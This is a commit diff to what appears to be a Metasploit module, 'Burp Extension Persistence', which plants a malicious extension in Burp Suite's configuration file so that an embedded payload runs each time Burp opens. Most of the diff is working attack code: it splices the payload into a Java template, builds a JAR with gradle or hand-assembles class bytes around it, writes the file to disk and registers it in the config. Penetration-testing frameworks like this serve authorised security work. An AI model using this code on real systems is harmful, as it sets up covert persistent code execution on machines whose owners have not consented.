burp extension persistence

h00die · Dec 29, 2024 · 3565f89 · 3565f89
1 parent 426f208
commit 3565f89
Showing 1 changed file with 40 additions and 6 deletions.
diff --git a/modules/exploits/multi/local/burp_extension_persistence.rb b/modules/exploits/multi/local/burp_extension_persistence.rb
@@ -17,6 +17,10 @@ def initialize(info = {})
         info,
         'Name' => 'Burp Extension Persistence',
         'Description' => %q{
+          This module adds a malicious extension to the Burp Suite configuration file. When burp is opened,
+          the extension will be loaded and the payload will be executed.
+
+          Tested against Burp Suite ????
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -108,7 +112,39 @@ def add_extension(settings_file, extension_location)
     write_file(settings_file, JSON.pretty_generate(config_contents))
   end
 
-  def extension(extension_name)
+  def run_local_gradle_build
+    # Check if gradle is installed
+    fails_with(Failure::NotFound, 'Gradle is not installed on this system (not target).') unless system('which gradle > /dev/null 2>&1')
+
+    # Define source and destination directories
+    src_dir = File.join(Msf::Config.data_directory, 'exploits', 'burp_extension')
+    temp_dir = Dir.mktmpdir
+
+    # Copy necessary files to the temporary directory
+    FileUtils.cp_r(File.join(src_dir, 'src'), temp_dir)
+    FileUtils.cp(File.join(src_dir, 'settings.gradle'), temp_dir)
+    FileUtils.cp(File.join(src_dir, 'build.gradle'), temp_dir)
+
+    # Modify burpExtension.java
+    java_file = File.join(temp_dir, 'src', 'burpExtension.java')
+    text = File.read(java_file)
+    new_contents = text.gsub('FOOBARBAZ', payload.encoded)
+                       .gsub('Metasploit Payload Extension', datastore['NAME'])
+    File.open(java_file, 'w') { |file| file.puts new_contents }
+
+    # Run gradle clean build
+    Dir.chdir(temp_dir) do
+      system('gradle clean build')
+    end
+
+    # Check if the jar file was created
+    jar_file = File.join(temp_dir, 'build', 'libs', 'MetasploitPayloadExtension.jar')
+    fails_with('Failed to create MetasploitPayloadExtension.jar') unless File.exist?(jar_file)
+
+    File.read(jar_file)
+  end
+
+  def compiled_extension(extension_name)
     # somewhat arbitrary line breaks to make it easier to read
     puts payload.encoded
     # puts int_to_slash_x_number(extension_name.length, 2)
@@ -120,8 +156,7 @@ def extension(extension_name)
     burp_extension_class << int_to_slash_x_number(extension_name.length, 2) # extension name length
     burp_extension_class << extension_name # extension name
     burp_extension_class << "\x0b\x00\x0a\x00\x0b\x07\x00\x0c\x0c\x00\x0d\x00\x0e\x01\x00\x1bburp/IBurpExtenderCallbacks\x01\x00\x10setExtensionName\x01\x00\x15(Ljava/lang/String;)V\x08\x00\x10"
-    # smaller payloads (400ish in size) don't have this, larger payloads
-    # like 800 do. not sure why though
+    # smaller payloads (400ish in size) don't have this byte, larger payloads like 800 do. not sure why though
     burp_extension_class << "\x01"
     burp_extension_class << int_to_slash_x_number(payload.encoded.length, 2) # payload length, 2 bytes \xNN\xNN
     burp_extension_class << payload.encoded # payload
@@ -156,7 +191,6 @@ def extension(extension_name)
     jar = Rex::Zip::Jar.new
     # build our manifest manually because its only one line and we don't need the extra
     # lines that build_manifest adds. This more closely implements the gradle build command
-    # jar.build_manifest
     jar.add_file('META-INF/', '')
     jar.add_file('META-INF/MANIFEST.MF', "Manifest-Version: 1.0\r\n\r\n")
     jar.add_file('burp/', '')
@@ -171,11 +205,11 @@ def exploit
     print_status("Using extension name: #{extension_name}")
     extension_location = "#{datastore['WritableDir']}/#{extension_name}.jar"
     vprint_status("Writing malcious extension to disk: #{extension_location}")
-    write_file(extension_location, extension(extension_name))
+    write_file(extension_location, compiled_extension(extension_name))
     register_files_for_cleanup(extension_location)
     vprint_status('Updating config file')
     add_extension(datastore['CONFIG'], extension_location)
 
-    print_good('extension enabled, waiting for Burp to open with the config.')
+    print_good('Extension enabled, waiting for Burp to open with the config.')
   end
 end